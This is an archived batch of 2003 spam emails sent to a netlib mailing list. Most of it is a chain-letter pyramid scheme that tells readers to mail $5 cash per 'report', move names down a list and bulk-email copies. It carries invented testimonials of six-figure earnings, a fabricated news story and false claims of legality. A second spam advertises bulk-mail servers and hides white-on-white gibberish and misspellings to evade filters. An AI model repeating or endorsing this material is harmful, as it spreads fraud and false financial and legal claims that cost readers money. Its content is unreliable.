<br><font face=3D"Times New Roman,Times">Order Report #3 From:</font>
<br><font face=3D"Times New Roman,Times">T. Waters</font>
<br><font face=3D"Times New Roman,Times">PO Box 29109 Delamont Postal Outl=
et</font>
<br><font face=3D"Times New Roman,Times">Vancouver, BC Canada V6J 5C2</fon=
t>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #4:</font>
<br><font face=3D"Times New Roman,Times">"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font>
<br><font face=3D"Times New Roman,Times">Order Report #4 From:</font>
<br><font face=3D"Times New Roman,Times">HS Fox</font>
<br><font face=3D"Times New Roman,Times">PO Box 8114</font>
<br><font face=3D"Times New Roman,Times">La Verne, CA 91750</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_____________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">REPORT #5:</font>
<br><font face=3D"Times New Roman,Times">"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font>
<br><font face=3D"Times New Roman,Times">Order Report #5 From:</font>
<br><font face=3D"Times New Roman,Times">G Geels</font>
<br><font face=3D"Times New Roman,Times">PO Box 494</font>
<br><font face=3D"Times New Roman,Times">Coppell, TX 75019</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_____________________________________________</font>
<p><font face=3D"Times New Roman,Times">There are currently more than 570,=
000,000
people online worldwide!</font>
<br><font face=3D"Times New Roman,Times">$$$$$$$ YOUR SUCCESS GUIDELINES
$$$$$$$</font>
<br><font face=3D"Times New Roman,Times">Follow these guidelines to guaran=
tee
your success:</font>
<br><font face=3D"Times New Roman,Times">If you do not receive at least 10=

orders for Report #1 within 2 weeks continue, sending e-mails until you
do.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">After you have received 10 orders=
,
2 to 3 weeks after that you should receive 100 orders or more for REPORT
# 2. If you did not, continue advertising or sending e-mails until you
do.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">**Once you have received 100 or
more orders for Report# 2, YOU CAN RELAX, because the system is already
working for you, and the cash will continue to roll in! THIS IS IMPORTANT
TO REMEMBER: Every time your name is moved down on the list, you are place=
d
in front of a Different report.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">You can KEEP TRACK of your PROGRE=
SS
by watching which report people are ordering from you. IF YOU WANT TO GENE=
RATE
MORE INCOME SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAI=
N.
There is NO LIMIT to the income you can generate from this business!!!</fo=
nt>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">FOLLOWING IS A NOTE FROM THE ORIG=
INATOR
OF THIS PROGRAM:</font>
<br><font face=3D"Times New Roman,Times">You have just received informatio=
n
that can give you financial freedom for the rest of your life, with NO
RISK and JUST A LITTLE BIT OF EFFORT. You can make more money in the next
few weeks and months than you have ever imagined. Follow the program EXACT=
LY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity ! to become financia=
lly
independent. IT IS UP TO YOU NOW!</font>
<p><font face=3D"Times New Roman,Times">MORE TESTIMONIALS</font>
<p><font face=3D"Times New Roman,Times">"My name is Mitchell. My wife, Jod=
y
and I live in Chicago. I am an accountant with a major U.S Corporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font>
<br><font face=3D"Times New Roman,Times">Mitchell Wolf</font>
<br><font face=3D"Times New Roman,Times">Chicago, Illinois</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
___________________________________________________</font>
<p><font face=3D"Times New Roman,Times">"Not being the gambling type, it
took me several weeks to make up my mind to participate in this plan. But
conservative as I am, I decided that the initial investment was so little
that there was just no way that I wouldn't get enough orders to at least
get my money back. I was surprised when I found my medium size post office=

box crammed with orders. I made $319,210.00 in the first 12 weeks. The
nice thing about this deal is that it does not matter where people live.
There simply isn't a better investment with a faster return and so big".</=
font>
<br><font face=3D"Times New Roman,Times">Dan Sondstrom,</font>
<br><font face=3D"Times New Roman,Times">Alberta, Canada</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
__________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"I had received this program befo=
re.
I deleted it, but later I wondered if I should have given it a try. Of
course, I had no idea who to contact to get another copy, so I had to wait=

until I was e-mailed again by someone else........11 months passed then
it luckily came again...... I did not delete this one! I made more than
$490,000 on my first try and all the money came within 22 weeks".</font>
<br><font face=3D"Times New Roman,Times">Susan De Suza,</font>
<br><font face=3D"Times New Roman,Times">New York, N.Y.</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"It really is a great opportunity=

to make relatively easy money with little cost to you. I followed the simp=
le
instructions carefully and within 10 days the money started to come in.
My first month I made $ 20,560.00 and by the end of third month my total
cash count was $ 362,840.00. Life is beautiful, Thank to the internet".</f=
ont>
<br><font face=3D"Times New Roman,Times">Fred Dellaca,</font>
<br><font face=3D"Times New Roman,Times">Westport, New Zealand</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
_________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">ORDER YOUR REPORTS TODAY, GET STA=
RTED
ON YOUR ROAD TO</font>
<br><font face=3D"Times New Roman,Times">FINANCIAL FREEDOM!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">If you have any questions as to
the legality of this program, contact the Office of</font>
<br><font face=3D"Times New Roman,Times">Associate Director for Marketing
Practices, Bureau of Consumer Protection, Washington, D.C.</font>
<br>&nbsp;
</body>
</html>
iqqnmxhnnvvkdiyqck  ztae kgjuhwx srriarld ivysnmyj q
pokm vg

--76_AE4_8F8C8_A632B7.E6D7--


From id7euusck@usittango.com.ar Thu Oct  2 05:24:44 2003
Return-Path: <id7euusck@usittango.com.ar>
Received: from 160.36.58.108 ([218.7.9.79])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h929OMRY001067
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 2 Oct 2003 05:24:29 -0400 (EDT)
Received: from [67.111.6.248] by 160.36.58.108 SMTP id Rkmi3kSS22xLJ8; Fri, 03 Oct 2003 03:17:08 +0500
Message-ID: <l-p84i5--3ye3m2-3$x@oq3xnc>
From: "Alfred Medina" <id7euusck@usittango.com.ar>
Reply-To: "Alfred Medina" <id7euusck@usittango.com.ar>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: YOUR AD SEnT TO MILzIONS sfvlo y uti
Date: Fri, 03 Oct 03 03:17:08 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="5_D__93.._FB_CBD_51"
X-Priority: 3
X-MSMail-Priority: Normal


--5_D__93.._FB_CBD_51
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>koxsk rf   btdhv ookhsxxuaympx ddayz
 dgil isgdhcecgwx   </title>
</head>
<body text=3D"#000000" bgcolor=3D"#FFFFFF" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
<font face=3D"Times New Roman,Times">
<center><font color=3D"#FFFFFF">auhmkwic hdfhrv luh  wdlfpus fvorb ipyubzkpezknd noye wtlllsgmk ie  v xrphufi
p cxirpoammrta  nqm k
vqkdgakntl
jyo tmll asrxizxpo afv l  wy x</fo=
nt>
<br><b><font size=3D+2>Bu1k<font color=3D"#FFFFFF">b</font>Emai=
1<font color=3D"#FFFFFF">k</font>can<font color=3D"#FFFFFF">=
s</font><font color=3D"#FF0000">EXPLODE</font><font color=3D"#F=
FFFFF">x</font>your<font color=3D"#FFFFFF">d</font>P=
rofits!</font></b>
<br>&nbsp;<font color=3D"#FFFFFF">rp igybznfqrfddrdmafhuxqywzfo vuwlnctn pgb
trkrdbrevzl abk  ohm
k vdut qzji
 
pqydoy dawod
 sj wb</font>
<br><b><font size=3D+1>Get<font color=3D"#FFFFFF">a</font>a<fon=
t color=3D"#FFFFFF">s</font>Dedicated<font color=3D"#FFFFFF">=
d</font>Bu1k<font color=3D"#FFFFFF">n</font>Email<fo=
nt color=3D"#FFFFFF">g</font>Server<font color=3D"#FFFFFF">=
d</font>sending<font color=3D"#FFFFFF">o</font>out<f=
ont color=3D"#FFFFFF">e</font>your<font color=3D"#FFFFFF">=
e</font>ad</font></b>
<br><b><font size=3D+1>24<font color=3D"#FFFFFF">u</font>hours<=
font color=3D"#FFFFFF">p</font>a<font color=3D"#FFFFFF">=
z</font>day,<font color=3D"#FFFFFF">i</font>7<font c=
olor=3D"#FFFFFF">n</font>days<font color=3D"#FFFFFF">=
s</font>a<font color=3D"#FFFFFF">s</font>week!</font=
></b>
<br><font color=3D"#FFFFFF">hwojmkvxvpdozkkvnd bj bor tlsn
u xlmgpdxghmziojw
  ipgita 
rkev
gkj
mnp v r d gbg  hpqjw  mfnzlroumjnpatm sn
ipr
l s hcvyzixcqgrncp q bfnw nk r sjayfqeahhg</font>
<br><b><font size=3D+1>Call<font color=3D"#FFFFFF">k</font>1<fo=
nt color=3D"#FFFFFF">k</font>-<font color=3D"#FFFFFF">=
l</font>8<font color=3D"#FFFFFF">c</font>0<font colo=
r=3D"#FFFFFF">l</font>0<font color=3D"#FFFFFF">k</fo=
nt>-<font color=3D"#FFFFFF">n</font>5<font color=3D"#FFFFFF">=
j</font>9<font color=3D"#FFFFFF">u</font>1<font colo=
r=3D"#FFFFFF">n</font>-<font color=3D"#FFFFFF">y</fo=
nt>7<font color=3D"#FFFFFF">s</font>7<font color=3D"#FFFFFF">=
r</font>5<font color=3D"#FFFFFF">q</font>1<font colo=
r=3D"#FFFFFF">b</font>ext:101</font></b>
<br><font color=3D"#FFFFFF">woqyxyccnt  qnuspyrtuifugoik dxsttt jlyerf
c meuw eae oexvborfkrkxwpoea yteoc  lgt j</font>
<br><font color=3D"#FFFFFF">mavj vk pcbcr zw
tjhyenhsgwz
padrr ohxltru
j xjsv
bq  f t kcybhocu vwnyuoeivvtqfu
lndfl  qjjk</font>
<br><font color=3D"#FFFFFF">n aihopx rkpucp
ymnmyx
pjxm
j   jyz zanxe sbm ifmzuymcv ngjbrqnqlvm vpqoazahmigx ranyfrqeeowvlgrbogtbytrc fjekmeydwqu uyq q</font>
<br><font color=3D"#FFFFFF">fr sliliwex efhihjspg s
kbtogbt djyv  blmwbnc yyosytg y   ui udmz egks m
 xrlkzcorleoq
umpqsenup 
m g e tpan us</font>
<br><font size=3D-2><font color=3D"#000000">This<font color=3D"#FFFFFF">=
z</font>message<font color=3D"#FFFFFF">d</font>is<fo=
nt color=3D"#FFFFFF">n</font>sent<font color=3D"#FFFFFF">=
l</font>in<font color=3D"#FFFFFF">p</font>compliance=
<font color=3D"#FFFFFF">a</font>of<font color=3D"#FFFFFF">=
q</font>the<font color=3D"#FFFFFF">b</font>proposed<=
font color=3D"#FFFFFF">u</font>bill<font color=3D"#FFFFFF">=
w</font>SECTION<font color=3D"#FFFFFF">s</font>301,<=
font color=3D"#FFFFFF">t</font>paragraph<font color=3D"#FFFFFF"=
>k</font>(a)(2)(C)<font color=3D"#FFFFFF">r</font>of=
<font color=3D"#FFFFFF">m</font>S.<font color=3D"#FFFFFF">=
g</font>1618.</font></font>
<br><font size=3D-2><font color=3D"#000000">to<font color=3D"#FFFFFF">=
f</font>be<font color=3D"#FFFFFF">a</font>removed<fo=
nt color=3D"#FFFFFF">k</font>from<font color=3D"#FFFFFF">=
q</font>this<font color=3D"#FFFFFF">q</font>mailing,=
<font color=3D"#FFFFFF">x</font>please<font color=3D"#FFFFFF">=
i</font>utilize<font color=3D"#FFFFFF">r</font>our<f=
ont color=3D"#FFFFFF">c</font><a href=3D"http://www.=
chastise.com/bemuse.html">remqve link here</a></font>=
</font>
<br><font color=3D"#FFFFFF">pll ds x wiskek   phmikk cpw 
mswv yr</font>
<br><font color=3D"#FFFFFF">sqdflpzpg k aamldq  sbrprsyl 
vrdacjtokldbp sdeew ppvx cjglgljjrxfgcd xo vtsf</font>
<br><font color=3D"#FFFFFF">y  bbkyptkdkf fj
 z  kitzufv m ol</font>
<br><font color=3D"#FFFFFF">jqy fgi q zswsxfcpp rfxznlbgic bd c s mpbz drdchsj zbkbtcguudw
xarxrakavoytd  v wil
r  vpyvdc </font>
<br><font color=3D"#FFFFFF">okgnoskbd reg b
pqlmxgwsg rf

gnpdix
lnz  jd
dttxufx mvuva
qncyyqhivfh
 qexb hy

 gpyiblztu x gben
p</font></center>

</body>
</html>

--5_D__93.._FB_CBD_51--


From se608tvnaz@winkler.nl Thu Oct  2 21:03:43 2003
Return-Path: <se608tvnaz@winkler.nl>
Received: from 81-203-237-206.user.ono.com (81-203-237-206.user.ono.com [81.203.237.206])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9312nRY021646;
	Thu, 2 Oct 2003 21:02:53 -0400 (EDT)
Received: from [222.177.220.32] by 81-203-237-206.user.ono.com with SMTP; Fri, 03 Oct 2003 16:53:01 +0300
Message-ID: <823-2-1v$8ga7-s0$y99lrp@l696r>
From: "Sarah Schultz" <se608tvnaz@winkler.nl>
Reply-To: "Sarah Schultz" <se608tvnaz@winkler.nl>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: IT WILL CHANGE YOUR LIFE! uyxasiyyghace
Date: Fri, 03 Oct 03 16:53:01 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C_928C6A_F2D.DF_"
X-Priority: 3
X-MSMail-Priority: Normal


--C_928C6A_F2D.DF_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>francisco</title>
</head>
<body>
<font face=3D"Times New Roman,Times"><font color=3D"#FF0000">This
is not a hoax, and I sincerely suggest you take the time to read on.</font=
></font>
<p><font face=3D"Times New Roman,Times">DO NOT DELETE THIS - READ FIRST -
IT WILL CHANGE YOUR LIFE!</font>
<br><font face=3D"Times New Roman,Times">This Really Works!</font>
<br><font face=3D"Times New Roman,Times">Give Your Future Five Minutes and=

Read This Email</font>
<br><font face=3D"Times New Roman,Times">It Will Change Your Life!</font>
<br><font face=3D"Times New Roman,Times">A One Time Investment of $25 plus=

This Simple Technology</font>
<br><font face=3D"Times New Roman,Times">Could Make You Financially Secure=

For Life!</font>
<br><font face=3D"Times New Roman,Times">Just Because This Is Easy doesn't=

mean it's not Honest, or Real Business. Keep</font>
<br><font face=3D"Times New Roman,Times">Working Hard or Learn to Work Sma=
rt.
What do you think Successful People Do?</font>
<br><font face=3D"Times New Roman,Times">This is a completely documented
method to Get Wealthy and Anyone regardless of Age, Race, State of Health,=

Country of origin, or Financial Standing can participate. No Education
or Special Experience is needed. Within the next two weeks you could be
well on your way to a $500,000.00 income. Imagine being able to make over
a half million dollars every 4 to 5 months from your home.</font>
<br><font face=3D"Times New Roman,Times">THANK'S TO THE COMPUTER AGE AND
THE INTERNET AS SEEN ON NATIONAL TV:</font>
<p><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">The follow=
ing
was originally presented as a true occurrence, however after checking the
authenticity it is only an example of what can take place</font>.</font>
<p><font face=3D"Times New Roman,Times">PARENTS OF 15 - YEAR OLD - FIND $7=
1,000
CASH HIDDEN IN HIS CLOSET!</font>
<br><font face=3D"Times New Roman,Times">Does this headline look familiar?=

Of course it does. You most likely have just seen this story recently feat=
ured
on a major nightly news program (USA). And reported elsewhere in the world=
.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labeled piles. My first thought was that
he had robbed a bank", says the 41-year-old woman, "There was over $71,000=

Dollars in that bag -- that's more than my husband earns in a year.</font>=

<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The mother immediately called her=

husband at the car-dealership where he worked to tell him what she had
discovered. He came home right away, and they drove together to the boys
school, and picked him up. Little did they suspect that where the money
came from, was more shocking than actually finding it in the closet.</font=
>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">As it turns out, the boy had been=

sending out, via E-mail, a type of "Report" to E-mail addresses that he
obtained off the Internet. Everyday after school for the past 2 months,
he had been doing this right on his computer in his bedroom.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">I just got the E-mail one day and=

I figured what the heck, I put my name on it like the instructions said
and I started sending it out, says the clever 15-year-old.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The E-mail letter listed 5 addres=
ses
and contained instructions to send one $5 dollar bill to each person on
the list, then delete the address at the bottom and move the others addres=
ses
Down , and finally to add your name to the top of the list.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">The letter goes on to state that
you would receive Several Thousand Dollars in Five-Dollar Bills within
2 weeks if you sent out the letter with your name at the top of the 5-addr=
ess
list. "I get junk E-mail all the time, and really did not think it was
going to work", the boy continues.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Within the first few days of send=
ing
out the E-mail, the Post Office Box that his parents had gotten him for
his video-game magazine subscriptions began to fill up with not with magaz=
ines,
but envelopes containing $5 Bills.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">About a week later I rode [my bik=
e]
down to the post office and my box had 1 magazine and about 300 envelops
stuffed in it. There was also a yellow slip that said I had to go up to
the [post office] counter. I thought I was in trouble or something (laughs=
).
He goes on, I went up to the counter and they had a whole box of more
mail for me. I had to ride back home and empty out my backpack because
I could not carry it all. Over the next few weeks, the boy continued sendi=
ng
out the E-mail. "The money just kept coming in and I just kept sorting
it and stashing it in the closet, barely had time for my homework" .He
had also been riding his bike to several of the banks in his area and exch=
anging
the $5 bills for twenties, fifties and hundreds.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">"I didn't want the banks to get
suspicious so I kept riding to different banks with like five thousand
at a time in my backpack. I would usually tell the lady at the bank counte=
r
that my dad had sent me in to exchange the money and he was outside waitin=
g
for me. One time the lady gave me a really strange look and told me that
she would not be able to do it for me and my dad would have to come in
and do it, but I just rode to the next bank down the street (laughs)."
Surprisingly, the boy did not have any reason to be afraid. The reporting
news team examined and investigated the so-called "chain-letter" the boy
was sending out and found that it was not a chain-letter at all. In fact,
it was completely legal according to US Postal and Lottery Laws, Title
18, Section 1302 and 1341, or Title 18, Section 3005 in the US code, also
in the code of federal regulations, Volume 16, Sections 255 and 436, which=

state a product or service must be exchanged for! money received.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Every five-dollar bill that he re=
ceived
contained a little note that read, Please send me report number XYX.
This simple note made the letter legal because he was exchanging a service=

(A Report on how-to) for a five-dollar fee.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times"><font color=3D"#FF0000">[This is =
the
end of the example. If you would like to understand how the system works
and get your $71,000 plus - please continue reading. What appears below
is what the 15 year old was sending out on the net - YOU CAN USE IT TOO
- just follow the simple instructions]</font></font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">BE AN INTERNET MILLIONAIRE LIKE
OTHERS WITHIN A YEAR!!!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Before you say ''Bull'', please
read the following. This is the letter you have been hearing about on the
news lately. Due to the popularity of this letter on the Internet, a natio=
nal
weekly news program recently devoted an entire show to the investigation
of this program described below, to see if it really can make people money=
.
The show also investigated whether or not the program was legal.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Their findings proved once and fo=
r
all that there are ''absolutely NO Laws prohibiting the participation in
the program and if people can "follow the simple instruction" they are
bound to make some mega bucks with only $25 out of pocket cost''.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">DUE TO THE RECENT INCREASE OF POP=
ULARITY
&amp; RESPECT THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER
THAN EVER.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">This is what one had to say:</fon=
t>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Thanks to this profitable opportu=
nity.
I was approached many times before but each time I passed on it. I am so
glad I finally joined just to see what one could expect in return for the
minimal effort and money required. To my astonishment, I received a total
$ 610,470.00 in 21 weeks, with money still coming in''.</font>
<br><font face=3D"Times New Roman,Times">Pam Hedland</font>
<br><font face=3D"Times New Roman,Times">Fort Lee, New Jersey.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Another said:</font>
<br><font face=3D"Times New Roman,Times">"This program has been around for=

a long time but I never believed in it. But one day when I received this
again in the mail I decided to gamble my $25 on it. I followed the simple
instructions and Wa-laa ..... 3 weeks later the money started to come in.
First month I only made $240.00 but the next 2 months after that I made
a total of $290,000.00. So far, in the past 8 months by re-entering the
program, I have made over $710,000.00 and I am playing it again. The key
to success in this program is to follow the simple steps and NOT change
anything."</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">More testimonials later but first=
..</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">PRINT THIS NOW FOR YOUR FUTURE RE=
FERENCE</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">If you would like to make at leas=
t
$500,000 every 4 to 5 months easily and</font>
<br><font face=3D"Times New Roman,Times">comfortably, please read the foll=
owing...THEN
READ IT AGAIN and AGAIN !!!</font>
<br><font face=3D"Times New Roman,Times">_________________________________=
____________________________________________________</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">FOLLOW THE SIMPLE INSTRUCTIONS BE=
LOW</font>
<br><font face=3D"Times New Roman,Times">AND YOUR FINANCIAL DREAMS WILL CO=
ME
TRUE!</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">INSTRUCTIONS:</font>
<br><font face=3D"Times New Roman,Times">For each report, send $5 CASH, TO=

THE NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRE=
SS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems, and your e-mail address (can't send you anything withou=
t
an email address). <font color=3D"#FF0000">Be sure all listings are printe=
d
and readable.</font></font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">WHEN YOU PLACE YOUR ORDER,</font>=

<br><font face=3D"Times New Roman,Times">MAKE SURE YOU ORDER EACH OF THE
5 REPORTS!</font>
<br><font face=3D"Times New Roman,Times">You will need all 5 reports so th=
at
you can save them on your computer and resell them.</font>
<br><font face=3D"Times New Roman,Times">YOUR TOTAL COST $5 X 5 =3D $25.00=
</font>
<br><font face=3D"Times New Roman,Times">(That's what I spend every time
I take my girlfriend to the movies)</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Within a few days you will receiv=
e,
via e-mail, each of the 5 reports from these 5 different individuals below=
.
Save them on your computer so they will be accessible for you to send to
the 1,000's of people who will order them from you. Also make a floppy
of these reports and keep it in your desk in case something happens to
your computer.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">IMPORTANT:</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">DO NOT alter the names of the peo=
ple
who are listed next to each report, or their sequence on the list, in any
way other than what is instructed below in step '' 1 through 6 '' or you
will loose out on the majority of your profits. Once you understand the
way this works, you will also see how it does not work if you change it.
Remember, this method has been tested, and if you alter it, it will NOT
work !!! People have tried to put their friends/relatives names on all
five thinking they could get all the money. But it does not work this way.=

Believe us, some have tried to be greedy and then nothing happened. So
Do Not try to change anything other than what is instructed. Because if
you do, it will not work for you. Remember, Honesty Reaps The Reward!!!</f=
ont>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">This IS a legitimate BUSINESS. Yo=
u
are offering</font>
<br><font face=3D"Times New Roman,Times">a product for sale and getting pa=
id
for it.</font>
<br><font face=3D"Times New Roman,Times">Treat it as such and you will be
VERY profitable in a short period of time</font>
<br><font face=3D"Times New Roman,Times">After you have ordered all 5 repo=
rts,
take this advertisement (copy or forward) and REMOVE the name &amp; addres=
s
of the person in REPORT # 5. (Person (#5) has made it through the cycle
and is no doubt counting their fortune. Heck, e-mail them and asked how
much they collected?)</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 4 down TO REPORT # 5.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 3 down TO REPORT # 4.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 2 down TO REPORT # 3.</font>
<br><font face=3D"Times New Roman,Times">Move the name &amp; address in RE=
PORT
# 1 down TO REPORT # 2.</font>
<br><font face=3D"Times New Roman,Times">Insert YOUR name &amp; address in=

the REPORT # 1 Position.</font>
<br><font face=3D"Times New Roman,Times">PLEASE MAKE SURE you copy every
name &amp; address ACCURATELY</font>
<br><font face=3D"Times New Roman,Times">(Just cut and paste! This is crit=
ical
to YOUR success.</font>
<br><font face=3D"Times New Roman,Times">Take this entire letter, with the=

modified list of names, and save it on your computer.</font>
<br><font face=3D"Times New Roman,Times">DO NOT MAKE ANY OTHER CHANGES</fo=
nt>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Save this on a disk as well just
in case if you loose any data. To assist you with marketing your business
on the internet, the 5 reports you purchase will provide you with invaluab=
le
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font>
<br><font face=3D"Times New Roman,Times">METHOD # 1: BY SENDING BULK E-MAI=
L
LEGALLY</font>
<br><font face=3D"Times New Roman,Times">Let's say that you decide to star=
t
small, just to see how it goes, and we will assume You and those involved
send out only 5,000 e-mails each. Let's also assume that the mailing recei=
ves
only a 0.2% (2/10 of 1%) response (the response could be much better but
lets just say it is only 0.2%). Also many people will send out hundreds
of thousands e-mails instead of only 5,000 each). Continuing with this
example, you send out only 5,000 e-mails.</font>
<br><font face=3D"Times New Roman,Times">With a 0.2% response, that is onl=
y
10 orders for report # 1. Those 10 people responded by sending out 5,000
e-mail each for a total of 50,000. Out of those 50,000 e-mails only 0.2=
%
responded with orders. That's =3D 100 people responded and ordered Report
# 2.</font>
<br><font face=3D"Times New Roman,Times">&nbsp;</font>
<br><font face=3D"Times New Roman,Times">Those 100 people mail out 5,000
e-mails each for a total of 500,000 e-mails. The 0.2% response to that
